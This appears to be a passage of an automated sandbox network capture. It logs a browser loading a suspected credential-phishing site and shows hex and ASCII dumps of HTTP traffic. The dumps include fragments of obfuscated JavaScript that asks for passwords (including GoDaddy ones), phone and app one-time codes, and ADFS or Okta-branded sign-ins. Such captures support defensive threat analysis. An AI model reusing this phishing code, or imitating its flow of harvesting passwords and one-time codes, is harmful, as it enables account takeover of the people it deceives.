                                                        2024-09-13 13:07:07 UTC474INData Raw: 9e be 63 00 40 a8 85 c6 44 18 30 f6 c0 da 0b 27 5c 84 48 51 a2 c5 d8 27 43 26 02 22 92 13 20 64 14 59 b2 e5 a0 3a 99 67 82 e6 ee 72 cf 1d 66 c7 a3 2c 1a da 79 0f 13 14 29 92 e2 71 c9 44 e4 e7 84 a0 c2 9f f7 0e ba a8 11 61 68 5f fa 1d ff f6 b8 d7 09 45 9d f7 18 61 a2 cf d1 a7 76 8f 13 7e b0 51 c5 d3 5b 09 40 57 2c 6f 6b b6 61 22 ea 37 fd 68 16 80 a1 c0 35 c2 0c d2 3a 85 ef 21 50 78 14 9f 15 27 6e bd a6 4d 6a 70 82 bc 56 5c ed c3 07 4f fc db 7e b8 f3 ce 26 a0 dc bc 05 0a 43 71 81 c0 11 41 31 9c 20 29 9a 61 39 5e 10 3b a3 77 e9 b5 a7 54 3d eb 39 f8 84 11 13 21 91 29 54 1a 9d c1 64 b1 39 5c 5e fe 82 0a 00 c0 d0 b2 c2 20 28 56 b8 c4 22 c4 92 8f 4b c4 db e9 d5 16 77 f3 73 34 90 cb 61 6b a5 67 b8 d1 63 dc 12 db 49 a1 78 8f 3a 70 56 78 9c f7 22 15 6d 55 d4 d2 cd
                                                        Data Ascii: c@D0'\HQ'C&" dY:grf,y)qDah_Eav~Q[@W,oka"7h5:!Px'nMjpV\O~&CqA1 )a9^;wT=9!)Td9\^ (V"Kws4akgcIx:pVx"mU


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        53192.168.2.549797172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:07 UTC1383OUTGET /347NbeCqp7yhC2mh5YXxi0qmbVijg5xGNhvJ1y5kE67110 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:07 UTC666INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:07 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="347NbeCqp7yhC2mh5YXxi0qmbVijg5xGNhvJ1y5kE67110"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BdwReFZNTdqjolPyF%2FA%2FhLPlcVyf3sXQsZ3GFZdhB3Em8q0%2FySoTRm5KrYJ%2BiSYakV%2BEvXzL1TnQEYY%2FEDAXm9E6DajiKUDWkmrzD7emctZSxsjcRPqLpS0ol0MkWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bc2ad75c427-EWR
                                                        2024-09-13 13:07:07 UTC703INData Raw: 33 37 38 33 0d 0a 63 6f 6e 73 74 20 5f 30 78 36 61 34 37 39 35 3d 5f 30 78 35 32 31 65 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 33 63 64 36 65 2c 5f 30 78 34 34 62 33 66 31 29 7b 63 6f 6e 73 74 20 5f 30 78 31 37 35 66 35 30 3d 5f 30 78 35 32 31 65 2c 5f 30 78 33 65 31 39 64 36 3d 5f 30 78 33 33 63 64 36 65 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 38 33 61 31 35 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 35 66 35 30 28 30 78 37 35 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 35 66 35 30 28 30 78 63 64 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 35 66 35 30 28 30 78 32 33 33 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 35 66 35 30 28 30 78 31 66
                                                        Data Ascii: 3783const _0x6a4795=_0x521e;(function(_0x33cd6e,_0x44b3f1){const _0x175f50=_0x521e,_0x3e19d6=_0x33cd6e();while(!![]){try{const _0x183a15=parseInt(_0x175f50(0x75))/0x1+parseInt(_0x175f50(0xcd))/0x2+parseInt(_0x175f50(0x233))/0x3*(-parseInt(_0x175f50(0x1f
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 30 78 30 2c 70 61 67 65 76 69 73 69 74 65 64 61 6c 72 65 61 64 79 3d 6e 75 6c 6c 3b 6c 65 74 20 76 69 65 77 74 79 70 65 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 31 39 65 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 64 61 38 36 35 3d 5b 27 77 61 69 74 69 6e 67 5c 78 32 30 66 6f 72 5c 78 32 30 70 72 65 76 69 6f 75 73 5c 78 32 30 72 65 71 75 65 73 74 5c 78 32 30 74 6f 5c 78 32 30 63 6f 6d 70 6c 65 74 65 27 2c 27 70 68 6f 6e 65 5c 78 32 30 6f 74 70 27 2c 27 31 31 32 35 30 34 57 52 72 67 62 41 27 2c 27 73 65 63 74 69 6f 6e 5f 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 73 27 2c 27 6c 69 6e 6b 6f 70 74 69 6f 6e 63 6c 69 63 6b 28 74 68 69 73 29 27 2c 27 70 72 6f 74 65 63 74 6f 70 74 69 6f 6e 73 27 2c 27 69 6d 67 27 2c 27 74 65 78 74 2d 6c 65 66 74 27
                                                        Data Ascii: 0x0,pagevisitedalready=null;let viewtype=null;function _0x419e(){const _0x3da865=['waiting\x20for\x20previous\x20request\x20to\x20complete','phone\x20otp','112504WRrgbA','section_multipleaccounts','linkoptionclick(this)','protectoptions','img','text-left'
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 78 32 32 27 2c 27 45 6d 61 69 6c 4f 54 50 5f 4c 69 76 65 5f 32 27 2c 27 3c 2f 73 70 61 6e 3e 3c 61 5c 78 32 30 69 64 3d 5c 78 32 32 56 69 65 77 44 65 74 61 69 6c 73 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6e 6f 2d 77 72 61 70 5c 78 32 32 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 23 5c 78 32 32 3e 56 69 65 77 5c 78 32 30 64 65 74 61 69 6c 73 3c 2f 61 3e 27 2c 27 73 65 63 74 69 6f 6e 5f 6f 74 70 27 2c 27 6d 6f 72 65 5c 78 32 30 69 6e 66 6f 5c 78 32 30 72 65 71 75 69 72 65 64 27 2c 27 69 63 6c 6f 75 64 2e 27 2c 27 73 75 63 63 65 73 73 27 2c 27 74 61 62 6c 65 2d 72 6f 77 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 27 2c 27 6d 65 74 68 6f 64 69 64 27 2c 27 53 69 67 6e 5c 78 32 30 69 6e 5c 78 32 30 75 73 69 6e 67 5c 78 32 30 61 6e 6f 74 68
                                                        Data Ascii: x22','EmailOTP_Live_2','</span><a\x20id=\x22ViewDetails\x22\x20class=\x22no-wrap\x22\x20href=\x22#\x22>View\x20details</a>','section_otp','more\x20info\x20required','icloud.','success','table-row','backgroundImage','methodid','Sign\x20in\x20using\x20anoth
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 78 32 32 53 65 6e 64 5c 78 32 30 63 6f 64 65 5c 78 32 32 5c 78 32 30 74 6f 5c 78 32 30 72 65 63 65 69 76 65 5c 78 32 30 79 6f 75 72 5c 78 32 30 63 6f 64 65 2e 27 2c 27 61 6e 69 6d 61 74 69 6f 6e 27 2c 27 69 6e 6e 65 72 54 65 78 74 27 2c 27 70 77 64 5f 67 6f 64 61 64 64 79 27 2c 27 73 65 73 73 69 6f 6e 5c 78 32 30 74 69 6d 65 6f 75 74 27 2c 27 65 72 72 6f 72 5f 76 65 72 69 66 79 65 6d 61 69 6c 27 2c 27 2e 69 41 64 64 69 74 69 6f 6e 61 6c 50 72 6f 6f 66 49 6e 66 6f 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 72 61 64 69 6f 5c 78 32 32 5d 27 2c 27 63 61 6c 6c 27 2c 27 54 68 61 74 5c 78 32 30 64 6f 65 73 6e 5c 78 32 37 74 5c 78 32 30 6d 61 74 63 68 5c 78 32 30 74 68 65 5c 78 32 30 61 6c 74 65 72 6e 61 74 65 5c 78 32 30 65 6d 61 69 6c 5c 78 32 30
                                                        Data Ascii: x22Send\x20code\x22\x20to\x20receive\x20your\x20code.','animation','innerText','pwd_godaddy','session\x20timeout','error_verifyemail','.iAdditionalProofInfo\x20input[type=\x22radio\x22]','call','That\x20doesn\x27t\x20match\x20the\x20alternate\x20email\x20
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 61 6c 65 72 74 5c 78 32 30 61 6c 65 72 74 2d 65 72 72 6f 72 5c 78 32 30 48 69 64 65 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 50 72 6f 6f 66 49 6e 70 75 74 45 72 72 6f 72 5c 78 32 32 3e 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 65 6d 61 69 6c 50 61 72 74 69 61 6c 5c 78 32 30 64 69 72 6c 74 72 5c 78 32 30 69 6e 70 75 74 2d 67 72 6f 75 70 5c 78 32 30 69 6e 70 75 74 2d 6d
                                                        Data Ascii: 22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22alert\x20alert-error\x20Hide\x22\x20id=\x22iProofInputError\x22></div>\x0a\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20<div\x20class=\x22emailPartial\x20dirltr\x20input-group\x20input-m
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 69 6e 70 75 74 2d 6d 61 78 2d 77 69 64 74 68 5c 78 32 32 5c 78 32 30 6d 61 78 6c 65 6e 67 74 68 3d 5c 78 32 32 34 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 72 65 71 75 69 72 65 64 3d 5c 78 32 32 74 72 75 65 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 6c 61 62 65 6c 3d 5c 78 32 32 4c 61 73 74 5c 78 32 30 34 5c 78 32 30 64 69 67 69 74 73 5c 78 32 30 6f 66 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6e 75 6d 62 65 72 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 32 32 69 50 72 6f 6f 66 49 6e 70 75 74 45 72 72 6f 72 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                        Data Ascii: form-control\x20input-max-width\x22\x20maxlength=\x224\x22\x20aria-required=\x22true\x22\x20aria-label=\x22Last\x204\x20digits\x20of\x20phone\x20number\x22\x20aria-describedby=\x22iProofInputError\x22>\x0a\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 72 65 71 69 64 27 2c 27 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 27 2c 27 50 68 6f 6e 65 41 70 70 4f 54 50 27 2c 27 6e 75 6c 6c 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 27 2c 27 23 62 74 6e 5f 76 65 72 69 66 79 6f 74 70 5f 6c 69 76 65 27 2c 27 2e 61 75 74 68 2d 6f 72 67 2d 6c 6f 67 6f 27 2c 27 61 70 70 65 6e 64 43 68 69 6c 64 27 2c 27 69 41 64 64 69 74 69 6f 6e 61 6c 50 72 6f 6f 66 49 6e 66 6f 27 2c 27 61 72 69 61 2d 6c 69 76 65 27 2c 27 45 72 72 6f 72 3a 27 2c 27 68 69 64 65 2d 74 6f 2d 6c 65 66 74 5c 78 32 30 27 2c 27 52 65 63 65 69 76 65 64 5c 78 32 30 72 65 73 70 6f 6e 73 65 3a 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 69 6d 61 67 65 27 2c 27 32 34 70 78 27 2c 27 34 71 4f 54 5a 43 69 27 2c 27 23 62 74 6e 5f 6e 65 78 74 27 2c 27 6d
                                                        Data Ascii: reqid','sections_godaddy','PhoneAppOTP','null','background-image','#btn_verifyotp_live','.auth-org-logo','appendChild','iAdditionalProofInfo','aria-live','Error:','hide-to-left\x20','Received\x20response:','backgroundimage','24px','4qOTZCi','#btn_next','m
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 32 5d 27 2c 27 54 68 65 5c 78 32 30 77 72 6f 6e 67 5c 78 32 30 63 6f 64 65 5c 78 32 30 77 61 73 5c 78 32 30 65 6e 74 65 72 65 64 2e 5c 78 32 30 53 65 6e 64 5c 78 32 30 79 6f 75 72 73 65 6c 66 5c 78 32 30 61 5c 78 32 30 6e 65 77 5c 78 32 30 63 6f 64 65 5c 78 32 30 61 6e 64 5c 78 32 30 74 72 79 5c 78 32 30 61 67 61 69 6e 2e 27 2c 27 64 69 73 70 6c 61 79 27 2c 27 23 74 72 79 61 67 61 69 6e 5f 77 69 74 68 6f 75 74 69 6e 74 65 72 6e 65 74 27 2c 27 62 74 6e 5f 70 72 6f 74 65 63 74 61 63 63 6f 75 6e 74 27 2c 27 63 68 65 63 6b 61 70 70 68 61 76 69 6e 67 74 72 6f 75 62 6c 65 73 65 63 74 69 6f 6e 27 2c 27 73 65 63 74 69 6f 6e 5f 73 69 64 65 62 61 72 6c 6f 67 69 6e 5f 61 64 66 73 27 2c 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 2c 27 72 65 6d 6f 76 65 27 2c 27 61 5f 74
                                                        Data Ascii: 2]','The\x20wrong\x20code\x20was\x20entered.\x20Send\x20yourself\x20a\x20new\x20code\x20and\x20try\x20again.','display','#tryagain_withoutinternet','btn_protectaccount','checkapphavingtroublesection','section_sidebarlogin_adfs','textContent','remove','a_t
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 72 69 61 2d 68 69 64 64 65 6e 3d 5c 78 32 32 74 72 75 65 5c 78 32 32 3e 4c 61 73 74 5c 78 32 30 34 5c 78 32 30 64 69 67 69 74 73 5c 78 32 30 6f 66 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6e 75 6d 62 65 72 3c 2f 6c 61 62 65 6c 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 6e 70 75 74 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 74 65 6c 5c 78 32 32 5c 78 32 30 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 5c 78 32 32 6f 66 66 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 50 72 6f 6f 66 50 68 6f 6e 65 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 69 50 72 6f 6f 66 50 68 6f 6e 65 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 69 6e 70 75 74
                                                        Data Ascii: ria-hidden=\x22true\x22>Last\x204\x20digits\x20of\x20phone\x20number</label>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<input\x20type=\x22tel\x22\x20autocomplete=\x22off\x22\x20id=\x22iProofPhone\x22\x20name=\x22iProofPhone\x22\x20class=\x22form-control\x20input
                                                        2024-09-13 13:07:07 UTC1369INData Raw: 64 69 67 69 74 73 5c 78 32 30 6f 66 5c 78 32 30 70 68 6f 6e 65 5c 78 32 30 6e 75 6d 62 65 72 27 2c 27 65 72 72 6f 72 5f 70 77 64 27 2c 27 61 70 70 72 6f 76 65 5c 78 32 30 61 75 74 68 5c 78 32 30 72 65 71 75 65 73 74 5c 78 32 30 61 75 74 68 5c 78 32 30 61 70 70 27 2c 27 70 77 64 27 2c 27 72 65 70 6c 61 63 65 27 2c 27 63 61 6c 6c 6f 74 70 27 2c 27 6f 74 70 6c 69 76 65 69 6d 67 27 2c 27 56 65 72 69 66 79 5c 78 32 30 6f 6e 6c 69 6e 65 27 2c 27 74 77 6f 66 61 73 65 6c 65 63 74 27 2c 27 65 72 72 6f 72 5f 61 75 74 68 63 61 6c 6c 27 2c 27 74 65 78 74 27 2c 27 5c 78 32 32 5c 78 32 30 6f 6e 63 6c 69 63 6b 3d 5c 78 32 32 6c 69 6e 6b 6f 70 74 69 6f 6e 63 6c 69 63 6b 28 74 68 69 73 29 5c 78 32 32 3e 27 2c 27 4f 6e 65 57 61 79 56 6f 69 63 65 4d 6f 62 69 6c 65 4f 54 50
                                                        Data Ascii: digits\x20of\x20phone\x20number','error_pwd','approve\x20auth\x20request\x20auth\x20app','pwd','replace','callotp','otpliveimg','Verify\x20online','twofaselect','error_authcall','text','\x22\x20onclick=\x22linkoptionclick(this)\x22>','OneWayVoiceMobileOTP


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        54192.168.2.54979313.33.187.1204433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:07 UTC611OUTGET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1
                                                        Host: ok4static.oktacdn.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:07 UTC684INHTTP/1.1 200 OK
                                                        Content-Type: image/png
                                                        Content-Length: 10796
                                                        Connection: close
                                                        Date: Mon, 02 Sep 2024 08:29:47 GMT
                                                        Server: nginx
                                                        Last-Modified: Tue, 23 Feb 2021 04:20:08 GMT
                                                        ETag: "12bdacc832185d0367ecc23fd24c86ce"
                                                        Expires: Tue, 02 Sep 2025 08:29:47 GMT
                                                        Cache-Control: max-age=31536000
                                                        Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                        Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                        Access-Control-Allow-Origin: *
                                                        Accept-Ranges: bytes
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 6b284415724869adc9db63c19e48e420.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: FRA60-P9
                                                        X-Amz-Cf-Id: VOUAGnyVhKLbY0CbVFPaZAabY_1mDpGvAalRKEXbQ80RQpGuqHavQA==
                                                        Age: 967040
                                                        2024-09-13 13:07:07 UTC10796INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a4 00 00 00 5e 08 06 00 00 00 6c 32 60 fe 00 00 29 f3 49 44 41 54 78 da ed 7d 09 9c 1c 55 9d ff a0 8b 20 77 a6 eb bd 1a 42 10 10 50 24 8a 48 76 09 c9 74 d5 ab ea 09 91 b8 a0 78 84 45 41 40 04 51 60 81 45 14 d0 15 02 88 c8 2d ec 8a 9c 22 97 28 e7 9f e5 58 60 89 11 44 2e c3 11 c8 35 5d 5d 55 7d cd 95 c9 9d 90 83 24 33 ff df af aa 26 e9 cc bc d7 67 75 4f 77 cf fb 7d 3e ef 13 98 99 ae 7e f5 8e df f7 77 ff 5a 5a 9a 84 12 7a eb be 96 d6 46 5a 24 49 92 24 49 92 a4 d1 a0 b8 4e fe b3 c7 a4 9d 09 9d ac 74 74 b2 24 65 90 c5 09 4d f9 c5 bc e9 ea ae 72 75 24 49 92 24 49 52 d5 68 81 41 76 4b 30 c5 74 19 b9 77 79 87 3a 98 31 e8 a0 a5 93 c1 44 ce 48 c3 cf d6 4c 53 07 01 98 92 69 46 7e b6 58 8f c4 e0 73 6d 72 f5 24
                                                        Data Ascii: PNGIHDR^l2`)IDATx}U wBP$HvtxEA@Q`E-"(X`D.5]]U}$3&guOw}>~wZZzFZ$I$INtt$eMru$I$IRhAvK0twy:1DHLSiF~Xsmr$


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        55192.168.2.549799172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:07 UTC1468OUTGET /kl1XjPKHnGhRdwLFWhMa3e96JMl95nsR8rSBiwellijqABwBMDvlTUNJo62aBcHTGWwx220 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:07 UTC678INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:07 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="kl1XjPKHnGhRdwLFWhMa3e96JMl95nsR8rSBiwellijqABwBMDvlTUNJo62aBcHTGWwx220"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XU%2BkDPJ%2B%2BdQqcviXomRxsju67dhWysvuWZg5O8TQOhz8COz98OTUDHoMGnuUH7tosLgh%2FzC19JEvVEPjghbc66U6wPNRyipvx23Wo%2F2tjFZJooGwtzWu3Xe52ArVpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bc3d8c932dc-EWR
                                                        2024-09-13 13:07:07 UTC691INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                        Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
